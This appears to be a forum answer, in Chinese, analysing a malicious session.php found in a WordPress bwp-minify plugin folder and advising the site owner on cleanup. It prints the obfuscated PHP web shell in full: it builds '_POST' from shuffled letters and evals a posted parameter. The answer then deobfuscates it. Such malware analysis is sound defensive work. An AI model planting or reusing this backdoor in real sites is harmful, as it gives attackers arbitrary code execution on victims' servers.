<?php $qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q79c1ec']))
{
eval(${$s20}['q79c1ec']);
}
?>
https://wordpress.org/plugins/bwp-minify/
在路径plugins/bwp-minify/min/lib/minify/js/session.php中
如果您从https://wordpress.org/plugins/bwp-minify/您可以看到归档中没有session.php文件。
有人在你的文件系统中注入了session.php。
该脚本正在尝试使用eval函数执行任何php代码。这肯定是一个安全问题,这就是为什么你的提供商关闭了你的网站。
代码的作用是什么;它试图使用$_POST['q79c1ec']变量,并通过将变量发布到web服务器来运行任何php代码。
如果您调试您可以看到的代码,则执行$s20 = "_POST"
和eval行,如eval($_POST['q79c1ec']);
session.php
文件不是有效的WordPress核心或插件文件,代码本身就是黑客攻击。
仔细遵循常见问题解答-我的网站被黑客攻击-WordPress Codex。
然后看看强化WordPress和WordPress Codex中的暴力攻击中推荐的安全措施。
更改所有密码。扫描你自己的电脑。告诉你的网络主机你被黑客入侵了;并考虑更改为更安全的主机:推荐的WordPress Web主机-WordPress Codex